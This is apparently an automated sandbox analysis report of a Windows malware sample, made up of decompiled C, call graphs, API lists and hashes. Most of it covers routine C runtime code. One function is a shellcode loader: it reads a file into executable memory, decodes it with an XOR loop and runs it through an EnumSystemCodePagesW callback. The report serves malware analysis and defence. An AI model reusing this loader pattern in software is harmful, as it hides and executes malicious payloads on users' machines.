2e5039 7938 2e5059 7936->7938 7942 2e4831 _free 58 API calls 7936->7942 7937 2e5140 7937->7933 7939 2e5153 7937->7939 7940 2e4831 _free 58 API calls 7937->7940 7938->7933 7943 2e442f __lock 58 API calls 7938->7943 7941 2e1cc3 __chsize_nolock 58 API calls 7939->7941 7940->7939 7941->7933 7942->7938 7945 2e5088 7943->7945 7944 2e5116 7965 2e5135 7944->7965 7945->7944 7947 2e4831 _free 58 API calls 7945->7947 7947->7944 7949 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7948->7949 7950 2e4cce 7949->7950 7951 2e4cef 7950->7951 7952 2e4cdd GetOEMCP 7950->7952 7953 2e4d06 7951->7953 7954 2e4cf4 GetACP 7951->7954 7952->7953 7953->7931 7953->7933 7954->7953 7956 2e4cbe getSystemCP 60 API calls 7955->7956 7957 2e5188 7956->7957 7959 2e51d9 IsValidCodePage 7957->7959 7962 2e518f setSBCS 7957->7962 7964 2e51fe _memset __setmbcp_nolock 7957->7964 7958 2e5770 ___crt_atoflt_l 6 API calls 7960 2e502a 7958->7960 7961 2e51eb GetCPInfo 7959->7961 7959->7962 7960->7936 7960->7937 7961->7962 7961->7964 7962->7958 7968 2e4d8b GetCPInfo 7964->7968 7978 2e4599 LeaveCriticalSection 7965->7978 7967 2e513c 7967->7933 7969 2e4e6d 7968->7969 7975 2e4dc3 7968->7975 7972 2e5770 ___crt_atoflt_l 6 API calls 7969->7972 7970 2e7a55 ___crtGetStringTypeA 61 API calls 7971 2e4e24 7970->7971 7973 2e7917 ___crtLCMapStringA 62 API calls 7971->7973 7974 2e4f19 7972->7974 7976 2e4e45 7973->7976 7974->7962 7975->7970 7977 2e7917 ___crtLCMapStringA 62 API calls 7976->7977 7977->7969 7978->7967 7881 2e33fc 7882 2e3431 7881->7882 7884 2e340c 7881->7884 7884->7882 7888 2e4961 7884->7888 7889 2e496d _doexit 7888->7889 7890 2e36db _LocaleUpdate::_LocaleUpdate 58 API calls 7889->7890 7891 2e4972 7890->7891 7892 2e7580 _abort 62 API calls 7891->7892 7893 2e4994 7892->7893 7570 2e1737 7573 2e3ec8 7570->7573 7572 2e173c 7572->7572 7574 2e3eeb 7573->7574 7575 2e3ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7573->7575 7574->7575 7576 2e3eef 7574->7576 7575->7576 7576->7572 7577 2e1f37 7584 2e58ce 7577->7584 7580 2e1f4a 7582 2e4831 _free 58 API calls 7580->7582 7583 2e1f55 7582->7583 7597 2e58d7 7584->7597 7586 2e1f3c 7586->7580 7587 2e5787 7586->7587 7588 2e5793 _doexit 7587->7588 7589 2e442f __lock 58 API calls 7588->7589 7590 2e579f 7589->7590 7591 2e5804 7590->7591 7594 2e57d8 DeleteCriticalSection 7590->7594 7614 2e7c39 7590->7614 7627 2e581b 7591->7627 7596 2e4831 _free 58 API calls 7594->7596 7595 2e5810 _doexit 7595->7580 7596->7590 7598 2e58e3 _doexit 7597->7598 7599 2e442f __lock 58 API calls 7598->7599 7605 2e58f2 7599->7605 7600 2e5990 7610 2e59b2 7600->7610 7602 2e1f9d _flsall 59 API calls 7602->7605 7603 2e599c _doexit 7603->7586 7605->7600 7605->7602 7606 2e5824 82 API calls __fflush_nolock 7605->7606 7607 2e597f 7605->7607 7606->7605 7608 2e2007 __getstream 2 API calls 7607->7608 7609 2e598d 7608->7609 7609->7605 7613 2e4599 LeaveCriticalSection 7610->7613 7612 2e59b9 7612->7603 7613->7612 7615 2e7c45 _doexit 7614->7615 7616 2e7c59 7615->7616 7617 2e7c71 7615->7617 7618 2e1cc3 __chsize_nolock 58 API calls 7616->7618 7620 2e1f5e __lock_file 59 API calls 7617->7620 7624 2e7c69 _doexit 7617->7624 7619 2e7c5e 7618->7619 7621 2e1e89 __wcsnicmp_l 9 API calls 7619->7621 7622 2e7c83 7620->7622 7621->7624 7630 2e7bcd 7622->7630 7624->7590 7689 2e4599 LeaveCriticalSection 7627->7689 7629 2e5822 7629->7595 7631 2e7bdc 7630->7631 7632 2e7bf0 7630->7632 7634 2e1cc3 __chsize_nolock 58 API calls 7631->7634 7633 2e7bec 7632->7633 7649 2e586a 7632->7649 7646 2e7ca8 7633->7646 7636 2e7be1 7634->7636 7638 2e1e89 __wcsnicmp_l 9 API calls 7636->7638 7638->7633 7641 2e2873 __fclose_nolock 58 API calls 7642 2e7c0a 7641->7642 7659 2e88a3 7642->7659 7644 2e7c10 7644->7633 7645 2e4831 _free 58 API calls 7644->7645 7645->7633 7647 2e1fcd __wfsopen 2 API calls 7646->7647 7648 2e7cae 7647->7648 7648->7624 7650 2e587d 7649->7650 7654 2e58a1 7649->7654 7651 2e2873 __fclose_nolock 58 API calls 7650->7651 7650->7654 7652 2e589a 7651->7652 7653 2e7d99 __write 78 API calls 7652->7653 7653->7654 7655 2e914b 7654->7655 7656 2e7c04 7655->7656 7657 2e9158 7655->7657 7656->7641 7657->7656 7658 2e4831 _free 58 API calls 7657->7658 7658->7656 7660 2e88af _doexit 7659->7660 7661 2e88bc 7660->7661 7662 2e88d3 7660->7662 7663 2e1c8f __chsize_nolock 58 API calls 7661->7663 7664 2e895e 7662->7664 7666 2e88e3 7662->7666 7665 2e88c1 7663->7665 7667 2e1c8f __chsize_nolock 58 API calls 7664->7667 7668 2e1cc3 __chsize_nolock 58 API calls 7665->7668 7669 2e890b 7666->7669 7670 2e8901 7666->7670 7671 2e8906 7667->7671 7681 2e88c8 _doexit 7668->7681 7672 2e6c88 ___lock_fhandle 59 API calls 7669->7672 7673 2e1c8f __chsize_nolock 58 API calls 7670->7673 7675 2e1cc3 __chsize_nolock 58 API calls 7671->7675 7674 2e8911 7672->7674 7673->7671 7677 2e892f 7674->7677 7678 2e8924 7674->7678 7676 2e896a 7675->7676 7679 2e1e89 __wcsnicmp_l 9 API calls 7676->7679 7682 2e1cc3 __chsize_nolock 58 API calls 7677->7682 7680 2e897e __close_nolock 61 API calls 7678->7680 7679->7681 7683 2e892a 7680->7683 7681->7644 7682->7683 7685 2e8956 7683->7685 7688 2e702e LeaveCriticalSection 7685->7688 7687 2e895c 7687->7681 7688->7687 7689->7629 7894 2e7577 7895 2e17be __lock 58 API calls 7894->7895 7896 2e757e 7895->7896 7979 2e16d3 7982 2e344b 7979->7982 7983 2e36f3 __getptd_noexit 58 API calls 7982->7983 7984 2e16e4 7983->7984 7845 2e2690 7846 2e26a2 7845->7846 7848 2e26b0 @_EH4_CallFilterFunc@8 7845->7848 7847 2e5770 ___crt_atoflt_l 6 API calls 7846->7847 7847->7848 7897 2e6470 RtlUnwind 7985 2e93d0 7986 2e93da 7985->7986 7987 2e93e6 7985->7987 7986->7987 7988 2e93df CloseHandle 7986->7988 7988->7987 7898 2e46f1 7899 2e4869 __calloc_crt 58 API calls 7898->7899 7900 2e46fb EncodePointer 7899->7900 7901 2e4714 7900->7901

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 2e12ba-2e12d3 1 2e12d5-2e12da 0->1 2 2e12f0 0->2 1->2 3 2e12dc-2e12de 1->3 4 2e12f2-2e12f8 2->4 5 2e12f9-2e12fe 3->5 6 2e12e0-2e12e5 call 2e1cc3 3->6 8 2e130c-2e1310 5->8 9 2e1300-2e130a 5->9 17 2e12eb call 2e1e89 6->17 12 2e1312-2e131d call 2e1530 8->12 13 2e1320-2e1322 8->13 9->8 11 2e1330-2e133f 9->11 15 2e1346 11->15 16 2e1341-2e1344 11->16 12->13 13->6 14 2e1324-2e132e 13->14 14->6 14->11 19 2e134b-2e1350 15->19 16->19 17->2 22 2e1439-2e143c 19->22 23 2e1356-2e135d 19->23 22->4 24 2e139e-2e13a0 23->24 25 2e135f-2e1367 23->25 26 2e140a-2e140b call 2e2752 24->26 27 2e13a2-2e13a4 24->27 25->24 28 2e1369 25->28 34 2e1410-2e1414 26->34 30 2e13c8-2e13d3 27->30 31 2e13a6-2e13ae 27->31 32 2e136f-2e1371 28->32 33 2e1467 28->33 37 2e13d7-2e13da 30->37 38 2e13d5 30->38 35 2e13be-2e13c2 31->35 36 2e13b0-2e13bc 31->36 39 2e1378-2e137d 32->39 40 2e1373-2e1375 32->40 41 2e146b-2e1474 33->41 34->41 42 2e1416-2e141b 34->42 43 2e13c4-2e13c6 35->43 36->43 44 2e13dc-2e13e8 call 2e2873 call 2e2a2a 37->44 45 2e1441-2e1445 37->45 38->37 39->45 46 2e1383-2e139c call 2e2897 39->46 40->39 41->4 42->45 47 2e141d-2e142e 42->47 43->37 61 2e13ed-2e13f2 44->61 48 2e1457-2e1462 call 2e1cc3 45->48 49 2e1447-2e1454 call 2e1530 45->49 60 2e13ff-2e1408 46->60 52 2e1431-2e1433 47->52 48->17 49->48 52->22 52->23 60->52 62 2e13f8-2e13fb 61->62 63 2e1479-2e147d 61->63 62->33 64 2e13fd 62->64 63->41 64->60
            C-Code - Quality: 69%
            			E002E12BA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
            				char* _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				void* __ebx;
            				void* __esi;
            				signed int _t74;
            				signed int _t78;
            				char _t81;
            				signed int _t86;
            				signed int _t88;
            				signed int _t91;
            				signed int _t94;
            				signed int _t97;
            				signed int _t98;
            				char* _t99;
            				signed int _t100;
            				signed int _t102;
            				signed int _t103;
            				signed int _t104;
            				char* _t110;
            				signed int _t113;
            				signed int _t117;
            				signed int _t119;
            				void* _t120;
            
            				_t99 = _a4;
            				_t74 = _a8;
            				_v8 = _t99;
            				_v12 = _t74;
            				if(_a12 == 0) {
            					L5:
            					return 0;
            				}
            				_t97 = _a16;
            				if(_t97 == 0) {
            					goto L5;
            				}
            				if(_t99 != 0) {
            					_t119 = _a20;
            					__eflags = _t119;
            					if(_t119 == 0) {
            						L9:
            						__eflags = _a8 - 0xffffffff;
            						if(_a8 != 0xffffffff) {
            							_t74 = E002E1530(_t99, 0, _a8);
            							_t120 = _t120 + 0xc;
            						}
            						__eflags = _t119;
            						if(_t119 == 0) {
            							goto L3;
            						} else {
            							_t78 = _t74 | 0xffffffff;
            							__eflags = _t97 - _t78 / _a12;
            							if(_t97 > _t78 / _a12) {
            								goto L3;
            							}
            							L13:
            							_t117 = _a12 * _t97;
            							__eflags =  *(_t119 + 0xc) & 0x0000010c;
            							_t98 = _t117;
            							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
            								_t100 = 0x1000;
            							} else {
            								_t100 =  *(_t119 + 0x18);
            							}
            							_v16 = _t100;
            							__eflags = _t117;
            							if(_t117 == 0) {
            								L41:
            								return _a16;
            							} else {
            								do {
            									__eflags =  *(_t119 + 0xc) & 0x0000010c;
            									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
            										L24:
            										__eflags = _t98 - _t100;
            										if(_t98 < _t100) {
            											_t81 = E002E2752(_t98, _t119, _t119); // executed
            											__eflags = _t81 - 0xffffffff;
            											if(_t81 == 0xffffffff) {
            												L46:
            												return (_t117 - _t98) / _a12;
            											}
            											_t102 = _v12;
            											__eflags = _t102;
            											if(_t102 == 0) {
            												L42:
            												__eflags = _a8 - 0xffffffff;
            												if(_a8 != 0xffffffff) {
            													E002E1530(_a4, 0, _a8);
            												}
            												 *((intOrPtr*)(E002E1CC3())) = 0x22;
            												L4:
            												E002E1E89();
            												goto L5;
            											}
            											_t110 = _v8;
            											 *_t110 = _t81;
            											_t98 = _t98 - 1;
            											_v8 = _t110 + 1;
            											_t103 = _t102 - 1;
            											__eflags = _t103;
            											_v12 = _t103;
            											_t100 =  *(_t119 + 0x18);
            											_v16 = _t100;
            											goto L40;
            										}
            										__eflags = _t100;
            										if(_t100 == 0) {
            											_t86 = 0x7fffffff;
            											__eflags = _t98 - 0x7fffffff;
            											if(_t98 <= 0x7fffffff) {
            												_t86 = _t98;
            											}
            										} else {
            											__eflags = _t98 - 0x7fffffff;
            											if(_t98 <= 0x7fffffff) {
            												_t44 = _t98 % _t100;
            												__eflags = _t44;
            												_t113 = _t44;
            												_t91 = _t98;
            											} else {
            												_t113 = 0x7fffffff % _t100;
            												_t91 = 0x7fffffff;
            											}
            											_t86 = _t91 - _t113;
            										}
            										__eflags = _t86 - _v12;
            										if(_t86 > _v12) {
            											goto L42;
            										} else {
            											_push(_t86);
            											_push(_v8);
            											_push(E002E2873(_t119)); // executed
            											_t88 = E002E2A2A(); // executed
            											_t120 = _t120 + 0xc;
            											__eflags = _t88;
            											if(_t88 == 0) {
            												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
            												goto L46;
            											}
            											__eflags = _t88 - 0xffffffff;
            											if(_t88 == 0xffffffff) {
            												L45:
            												_t64 = _t119 + 0xc;
            												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
            												__eflags =  *_t64;
            												goto L46;
            											}
            											_t98 = _t98 - _t88;
            											__eflags = _t98;
            											L36:
            											_v8 = _v8 + _t88;
            											_v12 = _v12 - _t88;
            											_t100 = _v16;
            											goto L40;
            										}
            									}
            									_t94 =  *(_t119 + 4);
            									_v20 = _t94;
            									__eflags = _t94;
            									if(__eflags == 0) {
            										goto L24;
            									}
            									if(__eflags < 0) {
            										goto L45;
            									}
            									__eflags = _t98 - _t94;
            									if(_t98 < _t94) {
            										_t94 = _t98;
            										_v20 = _t98;
            									}
            									_t104 = _v12;
            									__eflags = _t94 - _t104;
            									if(_t94 > _t104) {
            										goto L42;
            									} else {
            										E002E2897(_v8, _t104,  *_t119, _t94);
            										_t88 = _v20;
            										_t120 = _t120 + 0x10;
            										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
            										_t98 = _t98 - _t88;
            										 *_t119 =  *_t119 + _t88;
            										goto L36;
            									}
            									L40:
            									__eflags = _t98;
            								} while (_t98 != 0);
            								goto L41;
            							}
            						}
            					}
            					_t74 = (_t74 | 0xffffffff) / _a12;
            					__eflags = _t97 - _t74;
            					if(_t97 <= _t74) {
            						goto L13;
            					}
            					goto L9;
            				}
            				L3:
            				 *((intOrPtr*)(E002E1CC3())) = 0x16;
            				goto L4;
            			}




























            0x002e12c4
            0x002e12c7
            0x002e12cd
            0x002e12d0
            0x002e12d3
            0x002e12f0
            0x00000000
            0x002e12f0
            0x002e12d5
            0x002e12da
            0x00000000
            0x00000000
            0x002e12de
            0x002e12f9
            0x002e12fc
            0x002e12fe
            0x002e130c
            0x002e130c
            0x002e1310
            0x002e1318
            0x002e131d
            0x002e131d
            0x002e1320
            0x002e1322
            0x00000000
            0x002e1324
            0x002e1324
            0x002e132c
            0x002e132e
            0x00000000
            0x00000000
            0x002e1330
            0x002e1333
            0x002e1336
            0x002e133d
            0x002e133f
            0x002e1346
            0x002e1341
            0x002e1341
            0x002e1341
            0x002e134b
            0x002e134e
            0x002e1350
            0x002e1439
            0x00000000
            0x002e1356
            0x002e1356
            0x002e1356
            0x002e135d
            0x002e139e
            0x002e139e
            0x002e13a0
            0x002e140b
            0x002e1411
            0x002e1414
            0x002e146b
            0x00000000
            0x002e1471
            0x002e1416
            0x002e1419
            0x002e141b
            0x002e1441
            0x002e1441
            0x002e1445
            0x002e144f
            0x002e1454
            0x002e145c
            0x002e12eb
            0x002e12eb
            0x00000000
            0x002e12eb
            0x002e141d
            0x002e1420
            0x002e1423
            0x002e1424
            0x002e1427
            0x002e1427
            0x002e1428
            0x002e142b
            0x002e142e
            0x00000000
            0x002e142e
            0x002e13a2
            0x002e13a4
            0x002e13c8
            0x002e13cd
            0x002e13d3
            0x002e13d5
            0x002e13d5
            0x002e13a6
            0x002e13a8
            0x002e13ae
            0x002e13c0
            0x002e13c0
            0x002e13c0
            0x002e13c2
            0x002e13b0
            0x002e13b5
            0x002e13b7
            0x002e13b7
            0x002e13c4
            0x002e13c4
            0x002e13d7
            0x002e13da
            0x00000000
            0x002e13dc
            0x002e13dc
            0x002e13dd
            0x002e13e7
            0x002e13e8
            0x002e13ed
            0x002e13f0
            0x002e13f2
            0x002e1479
            0x00000000
            0x002e1479
            0x002e13f8
            0x002e13fb
            0x002e1467
            0x002e1467
            0x002e1467
            0x002e1467
            0x00000000
            0x002e1467
            0x002e13fd
            0x002e13fd
            0x002e13ff
            0x002e13ff
            0x002e1402
            0x002e1405
            0x00000000
            0x002e1405
            0x002e13da
            0x002e135f
            0x002e1362
            0x002e1365
            0x002e1367
            0x00000000
            0x00000000
            0x002e1369
            0x00000000
            0x00000000
            0x002e136f
            0x002e1371
            0x002e1373
            0x002e1375
            0x002e1375
            0x002e1378
            0x002e137b
            0x002e137d
            0x00000000
            0x002e1383
            0x002e138a
            0x002e138f
            0x002e1392
            0x002e1395
            0x002e1398
            0x002e139a
            0x00000000
            0x002e139a
            0x002e1431
            0x002e1431
            0x002e1431
            0x00000000
            0x002e1356
            0x002e1350
            0x002e1322
            0x002e1305
            0x002e1308
            0x002e130a
            0x00000000
            0x00000000
            0x00000000
            0x002e130a
            0x002e12e0
            0x002e12e5
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
            • String ID:
            • API String ID: 1559183368-0
            • Opcode ID: aa268b528c11a433dd5262b514e00719fd6780e13aa98440949dae7bf610eace
            • Instruction ID: e26872198e3d514d38b03515717230892349f2ed21cd7ceda9da50dc776bd851
            • Opcode Fuzzy Hash: aa268b528c11a433dd5262b514e00719fd6780e13aa98440949dae7bf610eace
            • Instruction Fuzzy Hash: 9E51B370A60786DBDB248FAB88806AE77B5AF41320FA48779F835966D0D7709D708B41
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 92%
            			E002E1000(void* __ecx, void* __eflags, intOrPtr _a12) {
            				intOrPtr _v8;
            				void* __ebx;
            				void* __edi;
            				intOrPtr _t6;
            				void* _t7;
            				_Unknown_base(*)()* _t8;
            				void* _t19;
            				_Unknown_base(*)()* _t20;
            				void* _t25;
            				void* _t26;
            				void* _t27;
            				intOrPtr* _t33;
            
            				_push(_t19);
            				_t27 = 0; // executed
            				_t6 = E002E1149(_t19, _t25, 0, 0x17d78400); // executed
            				 *_t33 = 0x2f3000;
            				_v8 = _t6;
            				_t7 = E002E11DB(_a12, _t26); // executed
            				_t8 = VirtualAlloc(0, 0x1433, 0x3000, 0x40); // executed
            				_t20 = _t8;
            				E002E147F(_t20, 0x1433, 1, _t7); // executed
            				_t10 = _v8;
            				if(_v8 != 0) {
            					E002E1530(_t10, 0xcb, 0x17d78400);
            					do {
            						 *(_t20 + _t27) = ( *(_t20 + _t27) - 0x00000009 ^ 0x0000000f) + 0x00000047 ^ 0x00000052;
            						_t27 = _t27 + 1;
            					} while (_t27 < 0x1433);
            					EnumSystemCodePagesW(_t20, 0); // executed
            				}
            				return 0;
            			}















            0x002e1004
            0x002e100c
            0x002e100e
            0x002e1013
            0x002e101d
            0x002e1020
            0x002e1036
            0x002e1044
            0x002e1048
            0x002e104d
            0x002e1055
            0x002e1062
            0x002e106a
            0x002e1075
            0x002e1078
            0x002e1079
            0x002e1080
            0x002e1080
            0x002e108c

            APIs
            • _malloc.LIBCMT ref: 002E100E
              • Part of subcall function 002E1149: __FF_MSGBANNER.LIBCMT ref: 002E1160
              • Part of subcall function 002E1149: __NMSG_WRITE.LIBCMT ref: 002E1167
              • Part of subcall function 002E1149: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,00000000,00000000,?,002E48C7,00000000,00000000,00000000,00000000,?,002E44F9,00000018,002F2280), ref: 002E118C
              • Part of subcall function 002E11DB: __wfsopen.LIBCMT ref: 002E11E6
            • VirtualAlloc.KERNELBASE(00000000,00001433,00003000,00000040), ref: 002E1036
            • __fread_nolock.LIBCMT ref: 002E1048
            • _memset.LIBCMT ref: 002E1062
            • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 002E1080
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
            • String ID:
            • API String ID: 3693343133-0
            • Opcode ID: 96e153beab87a24f54424d94654743333a4d56c1256286406c14aa18ff270ba3
            • Instruction ID: 4ff94ce60b984f4ad6106b9fadbc16e8ad067f74f9ba87d34f0f188faa901364
            • Opcode Fuzzy Hash: 96e153beab87a24f54424d94654743333a4d56c1256286406c14aa18ff270ba3
            • Instruction Fuzzy Hash: 2F0147B19803847BEB202B72EC4BF9B3B5CEF41B94F500431FA056E182E5B499214674
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 89%
            			E002E149A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
            				intOrPtr _t16;
            				intOrPtr _t19;
            				intOrPtr _t29;
            				void* _t32;
            
            				_push(0xc);
            				_push(0x2f2170);
            				E002E2400(__ebx, __edi, __esi);
            				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
            				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
            					L6:
            					_t16 = 0;
            				} else {
            					_t31 =  *((intOrPtr*)(_t32 + 0x18));
            					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
            						E002E1F5E(_t31);
            						 *((intOrPtr*)(_t32 - 4)) = 0;
            						_t19 = E002E12BA( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
            						_t29 = _t19;
            						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
            						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
            						E002E1523(_t31);
            						_t16 = _t29;
            					} else {
            						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
            							E002E1530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
            						}
            						 *((intOrPtr*)(E002E1CC3())) = 0x16;
            						E002E1E89();
            						goto L6;
            					}
            				}
            				return E002E2445(_t16);
            			}







            0x002e149a
            0x002e149c
            0x002e14a1
            0x002e14a8
            0x002e14ae
            0x002e14e1
            0x002e14e1
            0x002e14b5
            0x002e14b5
            0x002e14ba
            0x002e14ea
            0x002e14f0
            0x002e1500
            0x002e1508
            0x002e150a
            0x002e150d
            0x002e1514
            0x002e1519
            0x002e14bc
            0x002e14c0
            0x002e14c9
            0x002e14ce
            0x002e14d6
            0x002e14dc
            0x00000000
            0x002e14dc
            0x002e14ba
            0x002e14e8

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: __lock_file_memset
            • String ID:
            • API String ID: 26237723-0
            • Opcode ID: 389725d124659a5c446920306a3d73af076f4c7cee87b78890af434afa630387
            • Instruction ID: b6305ad2d264ca9925124acf093c41405541b0a18e2081c357435bdba9022bf3
            • Opcode Fuzzy Hash: 389725d124659a5c446920306a3d73af076f4c7cee87b78890af434afa630387
            • Instruction Fuzzy Hash: 0701D8718A0289EBCF21AFA78C0189F7B71AF80320F944235F8145A291D7718931DF91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 102 2e11db-2e11ef call 2e11f0
            C-Code - Quality: 25%
            			E002E11DB(intOrPtr _a4, intOrPtr _a8) {
            				void* __ebp;
            				void* _t3;
            				void* _t4;
            				void* _t5;
            				void* _t6;
            				void* _t9;
            
            				_push(0x40);
            				_push(_a8);
            				_push(_a4);
            				_t3 = E002E11F0(_t4, _t5, _t6, _t9); // executed
            				return _t3;
            			}









            0x002e11de
            0x002e11e0
            0x002e11e3
            0x002e11e6
            0x002e11ef

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: __wfsopen
            • String ID:
            • API String ID: 197181222-0
            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
            • Instruction ID: 67015401e565584d9e83b7bf132406915468a93eb44a1a41c4941c6b4f8afc28
            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
            • Instruction Fuzzy Hash: 95B0927648020C77CE022A83EC02A493B1A9B446A4F408020FB0C1C172A673A6709A89
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E002E43CC(struct _EXCEPTION_POINTERS* _a4) {
            
            				SetUnhandledExceptionFilter(0);
            				return UnhandledExceptionFilter(_a4);
            			}



            0x002e43d1
            0x002e43e1

            APIs
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002E1E2A,?,?,?,00000000), ref: 002E43D1
            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 002E43DA
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 6a05d7d6a3c01da6cbd7041c24a232f8b4b8cd030e08d788cd620a9c2c13fbf4
            • Instruction ID: 22636e435f70cd50a7e578115a069309c64d3aa025561e64cc07c78459df3501
            • Opcode Fuzzy Hash: 6a05d7d6a3c01da6cbd7041c24a232f8b4b8cd030e08d788cd620a9c2c13fbf4
            • Instruction Fuzzy Hash: A8B09235084248ABCF002B91FC8DB483F29EB14652F010410F60D5C0608B725C908A92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E002E439B(_Unknown_base(*)()* _a4) {
            
            				return SetUnhandledExceptionFilter(_a4);
            			}



            0x002e43a8

            APIs
            • SetUnhandledExceptionFilter.KERNEL32(?,?,002E3447,002E33FC), ref: 002E43A1
            Memory Dump Source
            • Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true
            • Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
            • Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 06195edd405ba63af909aef867d45964980a6877ec7b6c94886de2f2bd17c0df
            • Instruction ID: 8bb35203cfc8987501359737a244ab4b46cccdfdba539e1a7c0e7039825e497c
